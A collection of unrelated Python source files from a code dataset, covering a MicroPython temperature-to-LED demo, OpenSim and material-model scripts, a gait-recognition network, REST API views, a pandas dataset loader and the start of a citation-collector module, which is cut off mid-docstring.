12801185 | # demo of temperature-controlled neopixel ring
# 2017-0813 PePo - extracted from tutorial <NAME>!, youtube
# TMP36 instead of humidity
#
# Configuration:
# TMP36 is direct connected to ADC-port of Huzzah
# 8-neopixel stick is direct connected to pin 16 of Huzzah
# neopixelstick is powered from USB-port (which is 5V?!)
# TMP36 is powered from 3.3V (Huzzah)
from micropython import const
#import dht
import machine
import neopixel
import time
# h/w configuration
# NOTE(review): the file header says the neopixel stick is on pin 16, but the
# code uses 15 -- confirm the actual wiring.
__NEOPIXEL_PIN = const(15)
__NUMBER_OF_PIXELS = const(8) #neopixel-stick
__TMP_PIN = const(0) # ADC ESP8266 must be 0
#__DHT_PIN = const(13)
__MAX_BRIGHTNESS = const(50)

np = neopixel.NeoPixel(machine.Pin(__NEOPIXEL_PIN, machine.Pin.OUT), __NUMBER_OF_PIXELS)

# test the pixels: flash dim green for a second, then blank
np.fill((0,10,0))
np.write()
time.sleep(1.0)
# blank the pixels
np.fill((0,0,0))
np.write()

# TMP36 sensor (analog output read through the ADC)
tmp = machine.ADC(__TMP_PIN)
def temp(value):
    """Convert a TMP36 reading to degrees Celsius.

    Assumes *value* is in millivolts (TMP36: 500 mV offset at 0 degC,
    10 mV per degC) -- confirm the ADC scaling on the target board.
    """
    offset_mv = value - 500
    return offset_mv / 10.0
# read temperature, map it on scale to 40 i.e. enlarge the differences to see color differences
# 15 < t < 35: t - 15 -> scale 0 - 20
try:
    while True:
        temp_celsius = temp(tmp.read())
        t = temp_celsius - 15.0 #scale down
        print('T= {0:0.2f} C, t={1:0.2f}'.format(temp_celsius, t))
        # map temperature to a red/blue mix ("humidity" in the original
        # comment was a leftover from the DHT version of this demo)
        # NOTE(review): red is scaled from the shifted value t (/20.0) but
        # blue from the raw temp_celsius (/100.0) -- confirm this asymmetry
        # is intended.
        red = (t/20.0) * __MAX_BRIGHTNESS
        blue = ((20.0 - temp_celsius)/100.0) * __MAX_BRIGHTNESS
        np.fill((int(red), 0, int(blue)))
        np.write()
        time.sleep(2.0)
except OSError:
    pass
except:
    # bare except also swallows KeyboardInterrupt, so Ctrl-C prints 'done'
    print('done')
| StarcoderdataPython |
1856486 | from typing import Any
from fastapi import APIRouter
from app.schemas.msg import Msg
router = APIRouter()


@router.get(
    "/hello-world",
    response_model=Msg,
    status_code=200,
    include_in_schema=False,
)
def test_hello_world() -> Any:
    """Smoke-test endpoint returning a fixed greeting.

    Hidden from the generated OpenAPI docs via ``include_in_schema=False``.
    """
    return {"msg": "Hello world!"}
| StarcoderdataPython |
6614555 | <filename>Gui/opensim/Scripts/runTutorialTwo.py
# --------------------------------------------------------------------------- #
# OpenSim: runTutorialTwo.py #
# --------------------------------------------------------------------------- #
# OpenSim is a toolkit for musculoskeletal modeling and simulation, #
# developed as an open source project by a worldwide community. Development #
# and support is coordinated from Stanford University, with funding from the #
# U.S. NIH and DARPA. See http://opensim.stanford.edu and the README file #
# for more information including specific grant numbers. #
# #
# Copyright (c) 2005-2017 Stanford University and the Authors #
# Author(s): <NAME>, <NAME> #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); you may #
# not use this file except in compliance with the License. You may obtain a #
# copy of the License at http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
# --------------------------------------------------------------------------- #
# Written by <NAME>, Stanford University
## This example performs the steps of Tutorial Two in scripting form
import os.path

# getResourcesDir(), loadModel(), getCurrentModel(), modeling, etc. are
# injected into the global namespace by the OpenSim GUI scripting shell;
# this script must be run from inside the GUI.

# Define the files and folders we will be using
resourceDir = getResourcesDir()
modelFolder = os.path.join(resourceDir, "Models", "WristModel")
modelName = os.path.join(modelFolder, "wrist.osim")
# Load the model
loadModel(modelName)
# Get a handle to the current model
oldModel = getCurrentModel()
# Create a fresh copy (the loaded model stays untouched)
myModel = modeling.Model(oldModel)
# Initialize the copy, if values needed to be set in state
# pass along the variable myState returned by initSystem
myState = myModel.initSystem()
# Change the name of the model
##myModel.setName("Wrist Tendon Surgery.")
## Change the path points of the ECU_pre-surgery to match the existing ECU_post-surgery muscle
# updPathPointSet() gives a writable handle; getPathPointSet() is read-only
ECU_PRE_pps = myModel.getMuscles().get("ECU_pre-surgery").getGeometryPath().updPathPointSet()
ECU_POST_pps= myModel.getMuscles().get("ECU_post-surgery").getGeometryPath().getPathPointSet()
# Clear all path points from the ECU_pre-surgery path point set
ECU_PRE_pps.clearAndDestroy()
# Add path points from the ECU_post-surgery path to the ECU_pre-surgery path
for i in range(ECU_POST_pps.getSize()):
    ECU_PRE_pps.cloneAndAppend(ECU_POST_pps.get(i))
# re-initialize the model now that you changed the path points
myState = myModel.initSystem()
# Get full path name of myModel
fullPathName = myModel.getInputFileName()
# Save the modified model next to the original, with an _edited suffix
newName = fullPathName.replace('.osim', '_edited.osim')
myModel.print(newName)
# Load the edited model in the GUI
loadModel(newName)
## IV. Biomechanical Effects of Tendon Transfer
# Reload the unmodified model and compare pre/post transfer moments
loadModel(fullPathName)
currentModel = getCurrentModel()
myState = currentModel.initSystem()
# Summed wrist moment before vs. after the transfer
# (NOTE(review): the original comment mentioned RF/VASINT fiber lengths,
# apparently a leftover from a leg-model tutorial)
plotterPanel = createPlotterPanel("Wrist Deviation Moment vs. Deviation Angle. ")
crv1 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECRB+ECRL+ECU_pre-surgery+EDCI+EDCL+EDCM+EDCR+EDM+EIP+EPL","flexion")
setCurveLegend(crv1, "Before Transfer")
crv2 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECRB+ECRL+ECU_post-surgery+EDCI+EDCL+EDCM+EDCR+EDM+EIP+EPL","flexion")
setCurveLegend(crv2, "After Transfer")
## Effect of Tendon transfer on ECU muscle
# Wrist Moment VS Flexion
plotterPanel = createPlotterPanel("Wrist Moment VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECU_pre-surgery","flexion")
setCurveLegend(crv1, "Pre-Surgery")
crv2 = addAnalysisCurve(plotterPanel, "moment.flexion", "ECU_post-surgery","flexion")
setCurveLegend(crv2, "post-surgery")
# Tendon force VS Flexion
plotterPane2 = createPlotterPanel("Tendon force VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPane2, "tendon force", "ECU_pre-surgery","flexion")
setCurveLegend(crv1, "Pre-Surgery")
crv2 = addAnalysisCurve(plotterPane2, "tendon force", "ECU_post-surgery","flexion")
setCurveLegend(crv2, "post-surgery")
# flexion moment arm VS Flexion
plotterPane3 = createPlotterPanel("flexion moment arm VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPane3, "momentArm.flexion", "ECU_pre-surgery","flexion")
setCurveLegend(crv1, "Pre-Surgery")
crv2 = addAnalysisCurve(plotterPane3, "momentArm.flexion", "ECU_post-surgery","flexion")
setCurveLegend(crv2, "post-surgery")
# Create muscle objects for both a ECU pre- & post- surgery
# (note: these come from myModel, the edited copy created earlier)
ECUpresurgery = myModel.getMuscles().get("ECU_pre-surgery")
ECUpostsurgery = myModel.getMuscles().get("ECU_post-surgery")
# Find the optimal fibre length of that muscle
optLengthECUpre = ECUpresurgery.getOptimalFiberLength()
optLengthECUpost = ECUpostsurgery.getOptimalFiberLength()
## The Effect of Tendon Slack Length
myModel = getCurrentModel()
# Plot the muscle properties with existing Tendon-slack Length
# Tendon force VS Flexion
plotterPane1 = createPlotterPanel("Tendon force VS Flexion Angle")
crv1 = addAnalysisCurve(plotterPane1, "tendon force", "ECRB","flexion")
setCurveLegend(crv1, "ECRB")
# Muscle-tendon length VS Flexion
plotterPane2 = createPlotterPanel("Muscle-tendon length VS Flexion Angle")
crv2 = addAnalysisCurve(plotterPane2, "muscle-tendon length", "ECRB","flexion")
setCurveLegend(crv2, "ECRB")
# Fibre length VS Flexion
plotterPane3 = createPlotterPanel("Fibre length VS Flexion Angle")
crv3 = addAnalysisCurve(plotterPane3, "fiber-length", "ECRB","flexion")
setCurveLegend(crv3, "ECRB")
# Changing the optimal fibre length
# Create the ECRB muscle object
ECRB = myModel.getMuscles().get("ECRB")
# Back up the original tendon slack length (just in case)
backupTendonSlackLength = ECRB.getTendonSlackLength()
# Prescribe a new Tendon slack length
ECRB.setTendonSlackLength(0.2105)
# Re-initialize the states
myModel.initSystem()
# Plot the muscle properties with new Tendon-slack Length on the same panels
# Tendon force VS Flexion
crv4 = addAnalysisCurve(plotterPane1, "tendon force", "ECRB","flexion")
setCurveLegend(crv4, "ECRB_0.210")
# Muscle-tendon length VS Flexion
crv5 = addAnalysisCurve(plotterPane2, "muscle-tendon length", "ECRB","flexion")
setCurveLegend(crv5, "ECRB_0.210")
# Fibre length VS Flexion
crv6 = addAnalysisCurve(plotterPane3, "fiber-length", "ECRB","flexion")
setCurveLegend(crv6, "ECRB_0.210")
| StarcoderdataPython |
344784 |
from .tableentrysort import sort_table_entries
from .common import assert_prettifier_works
def test_table_sorting():
    """sort_table_entries orders a table's keys alphabetically while keeping
    values, multi-line arrays and the comment attached to ``id`` intact."""
    toml_text = """description = ""
firstname = "adnan"
lastname = "fatayerji"
git_aydo = ""
groups = ["sales", "dubai", "mgmt"]
skype = ""
emails = ["<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>"]
# I really like this table
id = "fatayera"
git_github = ""
telegram = "971507192009"
mobiles = ["971507192009"]
"""
    prettified = """description = ""
emails = ["<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>",
"<EMAIL>"]
firstname = "adnan"
git_aydo = ""
git_github = ""
groups = ["sales", "dubai", "mgmt"]
# I really like this table
id = "fatayera"
lastname = "fatayerji"
mobiles = ["971507192009"]
skype = ""
telegram = "971507192009"
"""
    assert_prettifier_works(toml_text, prettified, sort_table_entries)
| StarcoderdataPython |
12850319 | <filename>tour5_damage_bond/damage2d_explorer.py
import numpy as np
import sympy as sp
import bmcs_utils.api as bu
from bmcs_cross_section.pullout import MATS1D5BondSlipD
# Symbolic definition of the state variable: kappa is the Euclidean norm of
# the slip vector (s_x, s_y); lambdify turns it into a fast numpy callable.
s_x, s_y = sp.symbols('s_x, s_y')
kappa_ = sp.sqrt( s_x**2 + s_y**2 )
get_kappa = sp.lambdify( (s_x, s_y), kappa_, 'numpy' )
def get_tau_s(s_x_n1, s_y_n1, Eps_n, bs, **kw):
    '''Return updated state and stress for the slips in x, y directions.

    Parameters: s_x_n1/s_y_n1 are trial slips (scalars or arrays),
    Eps_n = [s_x, s_y, kappa] is the previous state, and bs is the bond-slip
    model providing the stiffness E_b and the damage function omega_fn_.
    Returns (Eps_n1, Sig_n1) = ([s_x, s_y, kappa], [tau_x, tau_y, omega]).
    '''
    _, _, kappa_n = Eps_n
    kappa = get_kappa(s_x_n1, s_y_n1)
    # Damage is irreversible: the history variable kappa never decreases.
    # np.maximum broadcasts the previous (possibly scalar) kappa against the
    # trial grid directly, so the explicit broadcast_to + stacked np.max of
    # the original is unnecessary; this also drops np.float_, which was
    # removed in NumPy 2.0.
    kappa_n1 = np.maximum(kappa_n, kappa)
    E_b = bs.E_b
    omega_n1 = bs.omega_fn_(kappa_n1)
    # Effective (damaged) secant stiffness applied to each slip component
    tau_x_n1 = (1 - omega_n1) * E_b * s_x_n1
    tau_y_n1 = (1 - omega_n1) * E_b * s_y_n1
    return (
        np.array([s_x_n1, s_y_n1, kappa_n1]),
        np.array([tau_x_n1, tau_y_n1, omega_n1])
    )
def plot_tau_s(ax, Eps_n, s_min, s_max, n_s, bs, **kw):
    """Plot the bond-stress surface |tau|(s_x, s_y) on a 3D matplotlib axis.

    Eps_n is the current state [s_x, s_y, kappa]; s_min/s_max/n_s define the
    slip grid; bs supplies E_b and the damage function omega_fn_.
    """
    # a complex step count makes np.mgrid produce exactly n_s points
    # including the endpoint
    n_s_i = complex(0,n_s)
    s_x_n1, s_y_n1 = np.mgrid[s_min:s_max:n_s_i, s_min:s_max:n_s_i]
    Eps_n1, Sig_n1 = get_tau_s(s_x_n1, s_y_n1, Eps_n, bs, **kw)
    s_x_n1, s_y_n1, _ = Eps_n1
    tau_x_n1, tau_y_n1, _ = Sig_n1
    tau_n1 = np.sqrt(tau_x_n1**2 + tau_y_n1**2)
    ax.plot_surface(s_x_n1, s_y_n1, tau_n1, alpha=0.2)
    # draw the current elastic-domain circle of radius r at z = 0 and at the
    # corresponding stress level f_t
    phi=np.linspace(0,2*np.pi,100)
    _, _, kappa_n = Eps_n
    kappa_0 = bs.omega_fn_.kappa_0
    E_b = bs.E_b
    r = max(kappa_0, kappa_n)
    omega_n = bs.omega_fn_(r)
    f_t = (1-omega_n)*E_b*r
    s0_x, s0_y = r*np.sin(phi), r*np.cos(phi)
    ax.plot(s0_x, s0_y, 0, color='gray')
    ax.plot(s0_x, s0_y, f_t, color='gray')
    ax.set_xlabel(r'$s_x$ [mm]');ax.set_ylabel(r'$s_y$ [mm]');
    ax.set_zlabel(r'$\| \tau \| = \sqrt{\tau_x^2 + \tau_y^2}$ [MPa]');
class Explore(bu.Model):
    """Interactive explorer for the 2D damage bond-slip model.

    Drives the slip state towards (s_x_1, s_y_1) in n_steps increments,
    records the stress/state history, and renders the damage surface with
    the loading trajectory on a 3D axis.
    """
    name = 'Damage model explorer'

    bs = bu.Instance(MATS1D5BondSlipD, ())
    tree = ['bs']

    def __init__(self, *args, **kw):
        super(Explore, self).__init__(*args, **kw)
        self.reset_i()

    def reset_i(self):
        """Reset the loading history and all state records."""
        self.s_x_0, self.s_y_0 = 0, 0
        self.t0 = 0
        self.Sig_record = []
        self.Eps_record = []
        self.t_arr = []
        self.s_x_t, self.s_y_t = [], []
        # state vector [s_x, s_y, kappa]; plain float dtype (np.float_ was
        # removed in NumPy 2.0); the unused local iter_record was dropped
        self.Eps_n1 = np.zeros((3,), dtype=float)

    def get_response_i(self, update_progress=lambda t: t):
        """Integrate one loading increment towards (s_x_1, s_y_1).

        update_progress is called with the pseudo-time after each step.
        (The parameter was missing before, so run() raised TypeError.)
        """
        # np.linspace needs an integer sample count; n_steps is a Float trait
        n_steps = int(self.n_steps)
        t1 = self.t0 + n_steps + 1
        ti_arr = np.linspace(self.t0, t1, n_steps + 1)
        si_x_t = np.linspace(self.s_x_0, self.s_x_1, n_steps + 1)
        si_y_t = np.linspace(self.s_y_0, self.s_y_1, n_steps + 1)
        for t, s_x_n1, s_y_n1 in zip(ti_arr, si_x_t, si_y_t):
            self.Eps_n1, self.Sig_n1 = get_tau_s(s_x_n1, s_y_n1, self.Eps_n1, self.bs)
            self.Sig_record.append(self.Sig_n1)
            self.Eps_record.append(self.Eps_n1)
            update_progress(t)
        # append this increment to the accumulated history
        self.t_arr = np.hstack([self.t_arr, ti_arr])
        self.s_x_t = np.hstack([self.s_x_t, si_x_t])
        self.s_y_t = np.hstack([self.s_y_t, si_y_t])
        self.t0 = t1
        self.s_x_0, self.s_y_0 = self.s_x_1, self.s_y_1
        return

    def plot_Sig_Eps(self, ax1, Sig_arr):
        """Plot the stress-norm trajectory along the recorded slip path."""
        tau_x, tau_y, kappa = Sig_arr.T
        tau = np.sqrt(tau_x ** 2 + tau_y ** 2)
        ax1.plot3D(self.s_x_t, self.s_y_t, tau, color='orange', lw=3)

    def subplots(self, fig):
        """Create the single 3D axis used by update_plot."""
        ax_sxy = fig.add_subplot(1, 1, 1, projection='3d')
        return ax_sxy

    def update_plot(self, ax):
        """Advance the loading and redraw surface, trajectory and slip path."""
        self.get_response_i()
        Sig_arr = np.array(self.Sig_record, dtype=float)
        Eps_arr = np.array(self.Eps_record, dtype=float)
        plot_tau_s(ax, Eps_arr[-1, ...],
                   self.s_min, self.s_max, 500, self.bs)
        self.plot_Sig_Eps(ax, Sig_arr)
        ax.plot(self.s_x_t, self.s_y_t, 0, color='red')

    n_s = bu.Int(500, BC=True)
    s_x_1 = bu.Float(0, BC=True)
    s_y_1 = bu.Float(0, BC=True)
    n_steps = bu.Float(20, BC=True)
    s_min = bu.Float(-0.1, BC=True)
    s_max = bu.Float(0.1, BC=True)

    def run(self, update_progress=lambda t: t):
        """Run one loading increment, reporting progress via the callback."""
        try:
            self.get_response_i(update_progress)
        except ValueError:
            print('No convergence reached')
            return

    t = bu.Float(0)
    t_max = bu.Float(1)

    def reset(self):
        self.reset_i()

    ipw_view = bu.View(
        bu.Item('s_max'),
        bu.Item('n_s'),
        bu.Item('s_x_1', editor=bu.FloatRangeEditor(low_name='s_min',high_name='s_max')),
        bu.Item('s_y_1', editor=bu.FloatRangeEditor(low_name='s_min',high_name='s_max')),
        bu.Item('n_steps'),
    )
| StarcoderdataPython |
1671103 | <filename>model/network/MT3D.py
import torch
import torch.nn as nn
import numpy as np
from .basic_blocks import SetBlock, BasicConv2d, M3DPooling, FramePooling, FramePooling1, LocalTransform, BasicConv3DB, GMAP, SeparateFC
class MTNet(nn.Module):
    """MT3D backbone: parallel frame-level (S) and clip-level (L) 3D-conv
    branches fused by local transforms, pooled and projected per strip."""

    def __init__(self, hidden_dim):
        super(MTNet, self).__init__()
        self.hidden_dim = hidden_dim
        self.batch_frame = None
        _set_in_channels = 1
        _set_channels = [32, 64, 128, 128]
        # stem conv: temporal stride 2 halves the frame dimension
        self.layer1 = nn.Conv3d(_set_in_channels, _set_channels[0], kernel_size=(3,3,3), stride=(2,1,1), padding=1,bias=False)
        # transform to clip level: each clip is convolved separately
        self.local_transform1 = LocalTransform(_set_channels[0], _set_channels[0],s=3)

        self.B3D_layer2_S = BasicConv3DB(_set_channels[0], _set_channels[1], padding=1)
        self.M3D_layer2_S = M3DPooling()
        self.B3D_layer2_L = BasicConv3DB(_set_channels[0], _set_channels[1], padding=1)
        self.M3D_layer2_L = M3DPooling()
        self.local_transform2 = LocalTransform(_set_channels[1], _set_channels[1],s=3)

        self.B3D_layer3_S1 = BasicConv3DB(_set_channels[1], _set_channels[2], padding=1)
        self.B3D_layer3_S2 = BasicConv3DB(_set_channels[2], _set_channels[3], padding=1)
        self.B3D_layer3_L1 = BasicConv3DB(_set_channels[1], _set_channels[2], padding=1)
        self.B3D_layer3_L2 = BasicConv3DB(_set_channels[2], _set_channels[3], padding=1)
        self.local_transform3 = LocalTransform(_set_channels[3], _set_channels[3],s=3)

        self.framepooling_S = FramePooling1()
        self.framepooling_L = FramePooling1()
        self.gmap_S = GMAP(w=22)
        self.gmap_L = GMAP(w=22)

        # separate FC: one (C, hidden_dim) projection per horizontal strip
        self.fc_bin = nn.Parameter(
            nn.init.xavier_uniform_(
                torch.zeros(64, _set_channels[3], self.hidden_dim)))

        for m in self.modules():
            # Conv3d added: the network is built from 3D convolutions, which
            # the original (Conv2d, Conv1d) check silently skipped.
            if isinstance(m, (nn.Conv3d, nn.Conv2d, nn.Conv1d)):
                nn.init.xavier_uniform_(m.weight.data)
            elif isinstance(m, nn.Linear):
                nn.init.xavier_uniform_(m.weight.data)
                # constant_/normal_: the non-underscore aliases are deprecated
                # and removed in recent PyTorch releases
                nn.init.constant_(m.bias.data, 0.0)
            elif isinstance(m, (nn.BatchNorm3d, nn.BatchNorm2d, nn.BatchNorm1d)):
                nn.init.normal_(m.weight.data, 1.0, 0.02)
                nn.init.constant_(m.bias.data, 0.0)

    def forward(self, silho, batch_frame=None):
        """silho: (n, s, h, w) silhouettes; batch_frame: optional per-sample
        frame counts (zero-padded at the end) used for multi-GPU batching."""
        # n: batch_size, s: frame_num, k: keypoints_num, c: channel
        if batch_frame is not None:
            batch_frame = batch_frame[0].data.cpu().numpy().tolist()
            _ = len(batch_frame)
            # strip the trailing zero padding from the frame-count list
            for i in range(len(batch_frame)):
                if batch_frame[-(i + 1)] != 0:
                    break
                else:
                    _ -= 1
            batch_frame = batch_frame[:_]
            frame_sum = np.sum(batch_frame)
            if frame_sum < silho.size(1):
                silho = silho[:, :frame_sum, :, :]
            self.batch_frame = [0] + np.cumsum(batch_frame).tolist()
        x = silho.unsqueeze(2)  # (n, s, 1, h, w), e.g. [12, 30, 1, 64, 44]
        del silho

        # layer1: to channels-first (n, c, s, h, w), then stem conv
        x = self.layer1(x.permute(0,2,1,3,4).contiguous())  # e.g. [12, 32, 15, 64, 44]
        x1 = self.local_transform1(x)  # clip-level branch, e.g. [12, 32, 5, 64, 44]

        # layer2: frame-level (S) and clip-level (L) branches, fused via transform
        x = self.B3D_layer2_S(x)   # [12, 64, 15, 64, 44]
        x = self.M3D_layer2_S(x)   # [12, 64, 15, 32, 22]
        x1 = self.B3D_layer2_L(x1) # [12, 64, 5, 64, 44]
        x1 = self.M3D_layer2_L(x1) # [12, 64, 5, 32, 22]
        x1 = x1 + self.local_transform2(x)  # [12, 64, 5, 32, 22]

        # layer3
        x = self.B3D_layer3_S1(x)
        x = self.B3D_layer3_S2(x)   # [12, 128, 15, 32, 22]
        x1 = self.B3D_layer3_L1(x1)
        x1 = self.B3D_layer3_L2(x1) # [12, 128, 5, 32, 22]
        x1 = x1 + self.local_transform3(x)  # [12, 128, 5, 32, 22]

        # frame pooling followed by global pooling over width (GMAP)
        x = self.framepooling_S(x)  # [12, 128, 1, 32, 22]
        x = self.gmap_S(x)          # [12, 128, 1, 32, 1]
        x1 = self.framepooling_L(x1)
        x1 = self.gmap_L(x1)

        # concatenate both branches along the strip axis, then project each
        # strip with its own FC weight (fc_bin)
        feature = torch.cat((x,x1),dim=3)  # [12, 128, 1, 64, 1]
        del x1
        del x
        feature = feature.squeeze(-1)                       # [12, 128, 1, 64]
        feature = feature.permute(0, 3, 2, 1).contiguous()  # [12, 64, 1, 128]
        feature = feature.matmul(self.fc_bin)               # [12, 64, hidden_dim]
        return feature.squeeze(2), None
1900527 | <reponame>tommyjcarpenter/dev-bootstrap
from setuptools import setup, find_packages
# Package metadata for the dev-environment bootstrapper; the CLI entry point
# is installed from bin/runboot.py.
setup(
    name="bootstrap",
    version="1.0.0",
    packages=find_packages(),
    author="<NAME>",
    author_email="<EMAIL>",
    description=("Dev env bootstrapping"),
    license="MIT",
    url="https://github.com/tommyjcarpenter/dev-bootstrap",
    install_requires=["click", "jsonschema"],
    scripts=["bin/runboot.py"],
)
| StarcoderdataPython |
6653586 | constants.physical_constants["kelvin-joule relationship"] | StarcoderdataPython |
8014368 | <filename>profiles_api/views.py
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status, viewsets, filters
from rest_framework.authentication import TokenAuthentication
from rest_framework.authtoken.views import ObtainAuthToken
from rest_framework.settings import api_settings
from rest_framework.permissions import IsAuthenticated
from . import serializers, models, permissions
class HelloAPIView(APIView):
    """Demonstration APIView exposing GET/POST/PUT/PATCH/DELETE handlers."""

    serializer_class = serializers.HelloSerializer

    def get(self, request, format=None):
        """List the features of the APIView base class."""
        features = [
            "Uses method (post, get, put, patch, delete)",
            "Similar to traditional django view",
            "Gives control over logic",
            "Is mapped to URLs",
        ]
        payload = {
            "Message": "Hello",
            "Api": features,
        }
        return Response(payload)

    def post(self, request):
        """Create a hello message greeting the submitted name."""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            return Response(serializer.errors,
                            status=status.HTTP_400_BAD_REQUEST)
        name = serializer.validated_data.get('name')
        return Response({"message": f'Hello {name}'})

    def put(self, request, pk=None):
        """Handle updating an object."""
        return Response({"message": "PUT"})

    def patch(self, request, pk=None):
        """Handle partially updating an object."""
        return Response({"message": "PATCH"})

    def delete(self, request, pk=None):
        """Handle deleting an object."""
        return Response({"message": "DELETE"})
class HelloViewSet(viewsets.ViewSet):
    """Demonstration ViewSet mirroring HelloAPIView with action methods."""

    serializer_class = serializers.HelloSerializer

    def list(self, request):
        """Describe what a ViewSet provides."""
        viewset_features = [
            'uses_action ,(List, Create, Retrieve, Update, Partial Update)',
            'Automatically maps to URL using Routers',
            'Provides more functionality with Less Code',
        ]
        return Response({
            "message": "Hello View Set",
            "view_set": viewset_features,
        })

    def create(self, request):
        """Create a hello message greeting the submitted name."""
        serializer = self.serializer_class(data=request.data)
        if not serializer.is_valid():
            return Response(
                serializer.errors,
                status=status.HTTP_400_BAD_REQUEST
            )
        name = serializer.validated_data.get('name')
        return Response({'message': f'Hello {name}!'})

    def retrieve(self, request, pk=None):
        """Handle getting an object by its ID."""
        return Response({'http_method': 'GET'})

    def update(self, request, pk=None):
        """Handle updating an object."""
        return Response({'http_method': 'PUT'})

    def partial_update(self, request, pk=None):
        """Handle updating part of an object."""
        return Response({'http_method': 'PATCH'})

    def destroy(self, request, pk=None):
        """Handle removing an object."""
        return Response({'http_method': 'DELETE'})
class UserProfileViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for user profiles.

    Token-authenticated; a profile may only be modified by its owner
    (UpdateOwnProfile). Supports search by name and email.
    """
    serializer_class = serializers.UserProfileSerializer
    queryset = models.UserProfile.objects.all()
    authentication_classes = (TokenAuthentication,)
    permission_classes = (permissions.UpdateOwnProfile,)
    filter_backends = (filters.SearchFilter,)
    search_fields = ('name', 'email',)
class UserLoginAPI(ObtainAuthToken):
    """Issue auth tokens; default renderers enable the browsable API form."""
    renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES
class UserProfileFeedViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for profile feed items.

    Requires token authentication; only the author may modify an item
    (UpdateOwnStatus).
    """
    authentication_classes = (TokenAuthentication,)
    serializer_class = serializers.ProfileFeedItemSerializer
    queryset = models.ProfileFeedItem.objects.all()
    permission_classes = (permissions.UpdateOwnStatus, IsAuthenticated,)

    def perform_create(self, serializer):
        """Attach the logged-in user to the new feed item (HTTP POST)."""
        serializer.save(user_profile=self.request.user)
3341206 | import pandas as pd
from pathlib import Path
from bert_clf.src.pandas_dataset.BaseDataset import BaseDataset
import os
class PandasDataset(BaseDataset):
    """
    Dataset class for datasets stored in simple tabular files
    (csv/tsv, xls/xlsx, json/jsonl).
    """
    def __init__(self,
                 train_data_path: str,
                 test_data_path: str = None,
                 random_state: int = 42,
                 text_label: str = '',
                 target_label: str = '',
                 test_size: float = 0.3
                 ):
        # Map lower-cased file extensions to reader callables. Must be set
        # before super().__init__, which presumably calls read_data() --
        # confirm against BaseDataset.
        self.valid_data_types = {
            '.csv': self._read_csv,
            '.tsv': self._read_csv,
            '.xls': self._read_excel,
            '.xlsx': self._read_excel,
            '.json': self._read_json,
            '.jsonl': self._read_json
        }
        super(PandasDataset, self).__init__(
            train_data_path=train_data_path,
            test_data_path=test_data_path,
            random_state=random_state,
            text_label=text_label,
            target_label=target_label,
            test_size=test_size
        )

    def read_data(self, path: Path) -> pd.DataFrame:
        """
        Dispatch to the reader matching the file extension of ``path``.

        The extension is lower-cased once and used consistently for both the
        membership check and the dictionary lookup (previously an upper-case
        extension such as ".CSV" passed the check but raised KeyError on the
        lookup). Raises ValueError for unsupported extensions.
        """
        extension = os.path.splitext(path)[1].lower()
        if extension in self.valid_data_types:
            return self.valid_data_types[extension](path=path, extension=extension)
        raise ValueError(f"Your data type ({extension}) is not supported, please convert your dataset "
                         f"to one of the following formats {list(self.valid_data_types.keys())}.")

    @staticmethod
    def _read_csv(path: Path, extension: str) -> pd.DataFrame:
        """
        Read a csv or tsv file given its path; tsv uses a tab separator.
        """
        sep = ','
        if extension == '.tsv':
            sep = '\t'
        return pd.read_csv(filepath_or_buffer=path, sep=sep, encoding="utf-8")

    @staticmethod
    def _read_excel(path: Path, extension: str) -> pd.DataFrame:
        """
        Read a xls or xlsx file given its path; xlsx requires openpyxl,
        xls falls back to pandas' default engine.
        """
        engine = 'openpyxl'
        if extension == '.xls':
            engine = None
        return pd.read_excel(io=path, engine=engine)

    @staticmethod
    def _read_json(path: Path, extension: str) -> pd.DataFrame:
        """
        Read a json or jsonl file given its path; jsonl is read line by line.
        """
        lines = False
        if extension == '.jsonl':
            lines = True
        return pd.read_json(path_or_buf=path, lines=lines, encoding="utf-8")
| StarcoderdataPython |
4898579 | <reponame>yarikoptic/duecredit
# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-
# ex: set sts=4 ts=4 sw=4 noet:
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
#
# See COPYING file distributed along with the duecredit package for the
# copyright and license terms.
#
# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##
"""Citation and citations Collector classes"""
import os
import sys
from functools import wraps
from six import iteritems, itervalues
from .config import DUECREDIT_FILE
from .entries import DueCreditEntry
from .stub import InactiveDueCreditCollector
from .io import TextOutput, PickleOutput
from .utils import never_fail, borrowdoc
from .versions import external_versions
from collections import namedtuple
import logging
lgr = logging.getLogger('duecredit.collector')

# (path, entry_key) pair uniquely identifying a citation within a collector
CitationKey = namedtuple('CitationKey', ['path', 'entry_key'])
class Citation(object):
    """Encapsulates citations and information on their use"""

    def __init__(self, entry, description=None, path=None, version=None,
                 cite_module=False, tags=('implementation',)):
        """Cite a reference

        Parameters
        ----------
        entry: str or DueCreditEntry
            The entry to use, either identified by its id or a new one (to be added)
        description: str, optional
            Description of what this functionality provides
        path: str
            Path to the object which this citation associated with. Format is
            "module[.submodules][:[class.]method]", i.e. ":" is used to separate module
            path from the path within the module.
        version: str or tuple, version
            Version of the beast (e.g. of the module) where applicable
        cite_module: bool, optional
            If it is a module citation, setting it to True would make that module citeable
            even without internal duecredited functionality invoked. Should be used only for
            core packages whenever it is reasonable to assume that its import constitute
            its use (e.g. numpy)
        tags: sequence of str, optional
            Tags to associate with the given code/reference combination. Some tags have
            associated semantics in duecredit, e.g.
            - "implementation" [default] tag describes as an implementation of the cited
              method
            - "reference-implementation" tag describes as the original implementation (ideally
